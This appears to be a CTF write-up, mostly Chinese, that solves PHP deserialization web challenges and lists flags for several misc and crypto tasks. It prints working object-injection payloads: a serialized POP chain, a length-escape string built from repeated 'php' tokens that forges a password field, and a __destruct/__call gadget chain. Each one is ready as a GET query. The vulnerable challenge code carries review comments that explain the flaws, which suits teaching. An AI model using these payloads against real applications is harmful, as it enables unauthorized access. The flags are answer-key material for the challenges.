WEB

pop

<?php
/**
 * Outermost link of the four-object chain used by the pop challenge.
 * $a1 is deliberately untyped: the builder script stores an A2 in it.
 */
class A1
{
    /** @var mixed null until assigned; null serializes as `N;`. */
    public $a1;
}
/**
 * Second link of the chain. Ships with a string default that the builder
 * script overwrites with an A3 instance.
 */
class A2
{
    /** @var mixed Default '10086' (a 5-byte string). */
    public $a2 = '10086';
}
/**
 * Third link of the chain; $a3 receives an A4 from the builder script.
 */
class A3
{
    /** @var mixed null until assigned. */
    public $a3;
}
/**
 * Innermost link of the chain; $a4 is never assigned and stays null.
 */
class A4
{
    /** @var mixed Always null in the chain (serialized as `N;`). */
    public $a4;
}

// Assemble the chain from the inside out (A4 -> A3 -> A2 -> A1) and print
// it serialized and URL-encoded so it can be pasted into a query string.
// A2's '10086' default is replaced by the A3 instance; only A4::$a4 stays
// null and serializes as N;.
$leaf = new A4();
$third = new A3();
$third->a3 = $leaf;
$second = new A2();
$second->a2 = $third;
$outer = new A1();
$outer->a1 = $second;
echo urlencode(serialize($outer));
GET:2025=admin&wlaq=O:2:"A1":1:{s:2:"a1";O:2:"A2":1:{s:2:"a2";O:2:"A3":1:{s:2:"a3";O:2:"A4":1:{s:2:"a4";N;}}}}

image-20250608115441393

CM{9CB0EFFC970B3870705A5DA1E85E242C}

扫目录发现 index.html，在源码中分别搜索 {、_、} 找到 flag

flag{yong_chu_xuelian}

can_u_escape

<?php
include("flag.php");
highlight_file(__FILE__);
/**
 * Replaces every occurrence of a blocked word with "hake".
 *
 * Replacement is sequential in array order ("flag" first, then "php"),
 * which is how str_replace() behaves with an array of needles. Because
 * "hake" is longer than "php", the byte length of the text changes; when
 * the caller applies this to an already-serialized string the s:N:
 * length prefixes no longer match the data, which is why unserialize()
 * on the result cannot be trusted. The safe place for this scrub is the
 * raw request value, before serialize().
 *
 * @param string $name Text to scrub.
 * @return string Scrubbed text.
 */
function filter($name)
{
    $blocked = ["flag", "php"];
    foreach ($blocked as $word) {
        $name = str_replace($word, "hake", $name);
    }
    return $name;
}
/**
 * Value object carrying the caller-supplied user name and a fixed password.
 * The surrounding script serializes it, scrubs the string, and unserializes
 * the result, then compares $pass with 'escaping'.
 */
class test
{
    /** @var mixed Whatever the constructor received (request data). */
    public $user;
    /** @var string Fixed default; never set by the constructor. */
    public $pass = 'daydream';

    /**
     * @param mixed $user Stored verbatim in $this->user.
     */
    public function __construct($user)
    {
        $this->user = $user;
    }
}
// NOTE(review): unserialize() here consumes attacker-influenced data:
// $_GET['a'] goes through serialize() and then through filter(), whose
// replacement changes byte lengths without touching the s:N: prefixes,
// so the object that comes back is not the one that was serialized.
// A fixed version scrubs $_GET['a'] before serialize(), or drops
// serialize()/unserialize() for request data entirely. The loose == on
// $pass is kept unchanged here to preserve the original behaviour.
$profile = unserialize(filter(serialize(new test($_GET['a']))));
if ($profile->pass == 'escaping') {
    echo $flag;
}

?>
<?php
/**
 * Local copy of the challenge's filter: every "flag" and "php" (in that
 * order) becomes "hake". Used to preview what the server-side scrub does
 * to a serialized string.
 *
 * @param string $name Text to scrub.
 * @return string Scrubbed text.
 */
function filter($name)
{
    return str_replace(["flag", "php"], "hake", $name);
}
/**
 * Mirror of the challenge's test class with the payload baked into the
 * $user default. The value consists of a run of "php" followed by a closing
 * quote and a forged `pass` property; because the server scrub lengthens
 * each "php" to "hake" without updating the s:N: prefix, the declared
 * length ends at the replaced run and the trailing text is parsed as
 * structure. This is the length-mismatch hazard of post-processing
 * serialized data, which the application, not the class, has to prevent.
 */
class test
{
    /** @var string Payload string; must stay byte-identical. */
    public $user = 'phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}';
    /** @var string Same fixed default as the challenge class. */
    public $pass = 'daydream';
}
// Print the serialized object twice: first as produced by serialize()
// (the payload counted into the s:N: length of $user), then after the
// server-side filter() so the effect of the length change is visible.
// In the second line the s:N: prefix of $user still counts the original
// bytes, while the data behind it has grown, so the forged
// `s:4:"pass";s:8:"escaping";` text is read as a property.
$probe = new test();
$raw = serialize($probe);
echo $raw;
echo "\n";
echo filter($raw);
GET:a=phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}

image-20250608114343451

WSCTF{9_kuai_big_bottle_ulog_tee}

1give!me!money!

1u_know?

//shop.php
<?php
// NOTE(review): $_GET['buy'] is handed straight to unserialize(). The
// check below only needs two strings, so json_decode() or plain query
// parameters would do the job without exposing object deserialization.
// $anotherthing, $otherthing and $flag1 are expected to come from
// change.php. Loose == comparisons are kept as in the original.
highlight_file(__FILE__);
include("change.php");
$order = unserialize($_GET['buy']);
$gift1 = "xiaomisu7";
$gift2 = "redmiK60";
if (!isset($_GET['buy'])) {
    echo "给她买什么好呢";
} else {
    $gift1 = $anotherthing;
    $gift2 = $otherthing;
    $wanted = $order['onething'] == $gift1 && $order['twothing'] == $gift2;
    if ($wanted) {
        echo $flag1;
        echo "谢谢你,你是个好人";
    } else {
        echo "女神:“哎呀我补药买这个”";
    }
}

?>

exp如下

<?php
// Serialize a two-entry array for the shop.php `buy` parameter.
// NOTE(review): shop.php indexes $un_buy['onething'] and
// $un_buy['twothing'], whereas this array uses 'anotherthing' and
// 'otherthing' as keys; verify which keys the intended solution relies on.
$buy = [
    'anotherthing' => "xiaomisu7",
    'otherthing' => "redmiK60",
];
echo serialize($buy);

//kfc.php
<?php
/**
 * Wraps an arbitrary $start value and calls helloworld() on it when the
 * object is destroyed. With unserialize() on request data, whatever object
 * the request describes ends up receiving that call; a $start without a
 * helloworld() method or a __call handler makes the destructor fatal.
 */
class order
{
    /** @var mixed Target of the helloworld() call in __destruct(). */
    public $start;

    /**
     * @param mixed $start Stored verbatim.
     */
    public function __construct($start)
    {
        $this->start = $start;
    }

    /** Invokes helloworld() on $start at destruction time. */
    public function __destruct()
    {
        $this->start->helloworld();
    }
}

/**
 * Catches calls to any undefined method and echoes the `douzhi` property
 * of $lbjjrj. Reading `douzhi` on an object that lacks it triggers that
 * object's __get() if it has one.
 */
class zhengcan
{
    /** @var mixed Object whose `douzhi` property is printed. */
    public $lbjjrj;

    /**
     * @param string $name Ignored method name.
     * @param array $arguments Ignored call arguments.
     */
    public function __call($name, $arguments)
    {
        $target = $this->lbjjrj;
        echo $target->douzhi;
    }
}

/**
 * Reads of undefined properties are swallowed: __get() prints an empty
 * string and, having no return statement, yields null to the reader.
 */
class tiandian
{
    /**
     * @param string $Attribute Name of the missing property (unused).
     */
    public function __get($Attribute)
    {
        echo '';
    }
}

// NOTE(review): request data goes straight into unserialize(); combined
// with the __destruct/__call/__get handlers defined above, a caller-chosen
// object graph decides which of those handlers run. For request data
// prefer json_decode(), or at least restrict unserialize() with the
// 'allowed_classes' option.
$payload = $_GET['serialize'] ?? null;
if ($payload === null) {
    echo "使用压缩包点单kfc.rar";
} else {
    unserialize($payload);
}
<?php
/**
 * Data-only mirror of the challenge's order class (no magic methods) so the
 * object graph can be serialized locally.
 */
class order
{
    /** @var mixed Assigned a zhengcan by the builder script. */
    public $start;
}

/**
 * Data-only mirror of the challenge's zhengcan class.
 */
class zhengcan
{
    /** @var mixed Assigned a tiandian by the builder script. */
    public $lbjjrj;
}

/**
 * Data-only mirror of the challenge's tiandian class; it has no properties
 * and serializes as an empty object.
 */
class tiandian
{
}

// Build order -> zhengcan -> tiandian from the inside out and print the
// serialized form (the same string the GET line carries).
$dessert = new tiandian();
$main = new zhengcan();
$main->lbjjrj = $dessert;
$ticket = new order();
$ticket->start = $main;
echo serialize($ticket);
# O:5:"order":1:{s:5:"start";O:8:"zhengcan":1:{s:6:"lbjjrj";O:8:"tiandian":0:{}}}
GET:serialize=O:5:"order":1:{s:5:"start";O:8:"zhengcan":1:{s:6:"lbjjrj";O:8:"tiandian":0:{}}}
5kLCBpdCdzIGp1c3QgbXkgaW1hZ2luYXJ5IGN5YmVyIGxpZmU=

MISC

1段涵涵学姐最爱的音乐

流量分析-1

tcp.flags.syn == 1 && tcp.flags.ack == 0

image-20250608102517787

CM{d28ee9d60772acbcd4eca38e1a3c94b8}

流量分析-2

image-20250608102800657

CRYPTO

Base141

image-20250608115601596

WSCTF{Y0u_kN0w_Ba5e_V3ry_W311}

RSA你太baby了